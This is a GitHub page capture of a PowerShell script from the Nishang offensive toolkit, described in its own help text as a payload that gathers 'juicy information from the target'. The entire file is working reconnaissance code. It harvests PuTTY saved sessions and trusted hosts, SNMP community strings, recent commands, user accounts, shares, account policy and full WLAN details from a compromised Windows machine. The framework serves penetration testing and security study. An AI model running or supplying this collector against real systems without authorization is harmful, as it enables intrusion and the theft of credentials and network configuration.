-
Notifications
You must be signed in to change notification settings - Fork 2.5k
/
Copy pathGet-Information.ps1
61 lines (51 loc) · 3.54 KB
/
Get-Information.ps1
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
function Get-Information
{
<#
.SYNOPSIS
Nishang Payload which gathers juicy information from the target.
.DESCRIPTION
This payload extracts information form registry and some commands.
The information available would be dependent on the privilege with which the script would be executed.
.EXAMPLE
PS > Get-Information
Use above to execute the function.
.LINK
http://labofapenetrationtester.blogspot.com/
https://github.com/samratashok/nishang
#>
[CmdletBinding()]
Param ()
function registry_values($regkey, $regvalue,$child)
{
if ($child -eq "no"){$key = get-item $regkey}
else{$key = get-childitem $regkey}
$key |
ForEach-Object {
$values = Get-ItemProperty $_.PSPath
ForEach ($value in $_.Property)
{
if ($regvalue -eq "all") {$values.$value}
elseif ($regvalue -eq "allname"){$value}
else {$values.$regvalue;break}
}}}
$output = "Logged in users:`n" + ((registry_values "hklm:\software\microsoft\windows nt\currentversion\profilelist" "profileimagepath") -join "`r`n")
$output = $output + "`n`n Powershell environment:`n" + ((registry_values "hklm:\software\microsoft\powershell" "allname") -join "`r`n")
$output = $output + "`n`n Putty trusted hosts:`n" + ((registry_values "hkcu:\software\simontatham\putty" "allname") -join "`r`n")
$output = $output + "`n`n Putty saved sessions:`n" + ((registry_values "hkcu:\software\simontatham\putty\sessions" "all") -join "`r`n")
$output = $output + "`n`n Recently used commands:`n" + ((registry_values "hkcu:\software\microsoft\windows\currentversion\explorer\runmru" "all" "no") -join "`r`n")
$output = $output + "`n`n Shares on the machine:`n" + ((registry_values "hklm:\SYSTEM\CurrentControlSet\services\LanmanServer\Shares" "all" "no") -join "`r`n")
$output = $output + "`n`n Environment variables:`n" + ((registry_values "hklm:\SYSTEM\CurrentControlSet\Control\Session Manager\Environment" "all" "no") -join "`r`n")
$output = $output + "`n`n More details for current user:`n" + ((registry_values "hkcu:\Volatile Environment" "all" "no") -join "`r`n")
$output = $output + "`n`n SNMP community strings:`n" + ((registry_values "hklm:\SYSTEM\CurrentControlSet\services\snmp\parameters\validcommunities" "all" "no") -join "`r`n")
$output = $output + "`n`n SNMP community strings for current user:`n" + ((registry_values "hkcu:\SYSTEM\CurrentControlSet\services\snmp\parameters\validcommunities" "all" "no") -join "`r`n")
$output = $output + "`n`n Installed Applications:`n" + ((registry_values "hklm:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall" "displayname") -join "`r`n")
$output = $output + "`n`n Installed Applications for current user:`n" + ((registry_values "hkcu:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall" "displayname") -join "`r`n")
$output = $output + "`n`n Domain Name:`n" + ((registry_values "hklm:\SOFTWARE\Microsoft\Windows\CurrentVersion\Group Policy\History\" "all" "no") -join "`r`n")
$output = $output + "`n`n Contents of /etc/hosts:`n" + ((get-content -path "C:\windows\System32\drivers\etc\hosts") -join "`r`n")
$output = $output + "`n`n Running Services:`n" + ((net start) -join "`r`n")
$output = $output + "`n`n Account Policy:`n" + ((net accounts) -join "`r`n")
$output = $output + "`n`n Local users:`n" + ((net user) -join "`r`n")
$output = $output + "`n`n Local Groups:`n" + ((net localgroup) -join "`r`n")
$output = $output + "`n`n WLAN Info:`n" + ((netsh wlan show all) -join "`r`n")
$output
}